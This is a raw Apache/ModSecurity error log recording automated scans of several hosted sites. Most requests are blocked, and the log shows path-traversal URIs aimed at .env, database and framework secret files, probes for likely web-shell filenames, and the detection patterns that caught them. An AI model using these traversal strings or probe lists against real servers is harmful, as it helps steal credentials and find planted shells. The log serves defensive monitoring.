[Tue May 12 05:24:00.324529 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:26210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdUNr1yOh9Tvizezid9gAAAFI"]
[Tue May 12 05:24:00.328148 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.238:26214] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "mail.letamsgarage.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKdUM1tk6y7yBJLpJo4jAAAAJY"]
[Tue May 12 05:24:00.328423 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.238:26214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKdUM1tk6y7yBJLpJo4jAAAAJY"]
[Tue May 12 05:24:00.445963 2026] [security2:error] [pid 1825287:tid 1825316] [client 45.148.10.238:30062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdRAgpmE1yW0glLdgsvgAAAMs"]
[Tue May 12 05:24:00.450169 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/2.php
[Tue May 12 05:24:00.580625 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/abcd.php
[Tue May 12 05:24:01.452149 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:7554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdMs1tk6y7yBJLpJo4agAAAIs"]
[Tue May 12 05:24:01.525354 2026] [security2:error] [pid 1808852:tid 1808874] [client 45.148.10.238:7540] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdLxfeipD4uoG21FovPQAAABM"]
[Tue May 12 05:24:01.568962 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/asd.php
[Tue May 12 05:24:01.697345 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/default.php
[Tue May 12 05:24:01.796022 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:7546] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdL9r1yOh9Tvizezid3gAAAFg"]
[Tue May 12 05:24:01.813002 2026] [security2:error] [pid 1808852:tid 1808879] [client 45.148.10.238:57320] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdGhfeipD4uoG21FovIAAAABg"]
[Tue May 12 05:24:01.823125 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/gettest.php
[Tue May 12 05:24:02.460087 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/install.php
[Tue May 12 05:24:02.469107 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:28566] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdJfaAnTZtx1_H_wy1jAAAAVA"]
[Tue May 12 05:24:02.586765 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/tfm.php
[Tue May 12 05:24:02.712513 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/ws81.php
[Tue May 12 05:24:03.129415 2026] [security2:error] [pid 1825287:tid 1825320] [client 45.148.10.238:28554] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdJQgpmE1yW0glLdgsgAAAAM8"]
[Tue May 12 05:24:03.251300 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/222.php
[Tue May 12 05:24:03.725286 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:26228] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdUwgpmE1yW0glLdgs1wAAAMQ"]
[Tue May 12 05:24:03.725493 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:26228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdUwgpmE1yW0glLdgs1wAAAMQ"]
[Tue May 12 05:24:03.802140 2026] [security2:error] [pid 1844863:tid 1844870] [client 45.148.10.238:36062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdOfaAnTZtx1_H_wy1qgAAAUE"]
[Tue May 12 05:24:03.815692 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/t.php
[Tue May 12 05:24:04.384141 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.238:30090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdSM1tk6y7yBJLpJo4iAAAAIE"]
[Tue May 12 05:24:04.443520 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/6xBAm3vODE05BSzkJZRAws.php
[Tue May 12 05:24:04.960969 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/a.php
[Tue May 12 05:24:05.283043 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/a1.php
[Tue May 12 05:24:05.412290 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/onclickfuns.php
[Tue May 12 05:24:05.437140 2026] [security2:error] [pid 1842385:tid 1842392] [client 45.148.10.238:36072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdPRs7kySIUZ3ORnIk6wAAAQI"]
[Tue May 12 05:24:05.446130 2026] [security2:error] [pid 1842385:tid 1842402] [client 45.148.10.238:36056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdORs7kySIUZ3ORnIk6gAAAQw"]
[Tue May 12 05:24:05.559349 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/w.php
[Tue May 12 05:24:06.553513 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/wp-good.php
[Tue May 12 05:24:06.968926 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/.info.php
[Tue May 12 05:24:07.305130 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/config.php
[Tue May 12 05:24:07.324293 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdVwgpmE1yW0glLdgs3gAAAMo"]
[Tue May 12 05:24:07.324515 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdVwgpmE1yW0glLdgs3gAAAMo"]
[Tue May 12 05:24:07.432914 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/item.php
[Tue May 12 05:24:07.559081 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/m.php
[Tue May 12 05:24:07.877588 2026] [:error] [pid 1844863:tid 1844893] [client 52.172.142.96:16245] File does not exist: /home/pweilcom/public_html/rh.php
[Tue May 12 05:24:08.235968 2026] [security2:error] [pid 1820198:tid 1820222] [client 45.148.10.238:26214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdUM1tk6y7yBJLpJo4jAAAAJY"]
[Tue May 12 05:24:08.792954 2026] [security2:error] [pid 1825287:tid 1825309] [client 45.148.10.238:26228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdUwgpmE1yW0glLdgs1wAAAMQ"]
[Tue May 12 05:24:08.883565 2026] [security2:error] [pid 1825179:tid 1825216] [client 45.148.10.238:26210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdUNr1yOh9Tvizezid9gAAAFI"]
[Tue May 12 05:24:09.562611 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdVwgpmE1yW0glLdgs3gAAAMo"]
[Tue May 12 05:24:09.579517 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdWQgpmE1yW0glLdgs5wAAAMo"]
[Tue May 12 05:24:09.579589 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdWQgpmE1yW0glLdgs5wAAAMo"]
[Tue May 12 05:24:09.579758 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdWQgpmE1yW0glLdgs5wAAAMo"]
[Tue May 12 05:24:11.026996 2026] [security2:error] [pid 1808852:tid 1808876] [client 54.152.163.42:20686] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/supermodelporn.com"] [unique_id "agKdWxfeipD4uoG21FovlAAAABU"]
[Tue May 12 05:24:11.027351 2026] [security2:error] [pid 1808852:tid 1808876] [client 54.152.163.42:20686] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/supermodelporn.com"] [unique_id "agKdWxfeipD4uoG21FovlAAAABU"]
[Tue May 12 05:24:11.027601 2026] [security2:error] [pid 1808852:tid 1808876] [client 54.152.163.42:20686] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/supermodelporn.com"] [unique_id "agKdWxfeipD4uoG21FovlAAAABU"]
[Tue May 12 05:24:11.315239 2026] [security2:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdWQgpmE1yW0glLdgs5wAAAMo"]
[Tue May 12 05:24:11.331444 2026] [core:error] [pid 1825287:tid 1825315] [client 45.148.10.238:48490] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 05:24:14.138247 2026] [core:error] [pid 1825179:tid 1825198] [client 45.148.10.238:60090] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 05:24:17.015518 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdYQgpmE1yW0glLdgtGgAAAMA"]
[Tue May 12 05:24:17.015602 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdYQgpmE1yW0glLdgtGgAAAMA"]
[Tue May 12 05:24:17.015913 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdYQgpmE1yW0glLdgtGgAAAMA"]
[Tue May 12 05:24:17.481960 2026] [:error] [pid 1820198:tid 1820208] [client 4.193.137.131:6089] File does not exist: /home/cyrilet1/moncampingcarenligne.com/alfanew2.php7
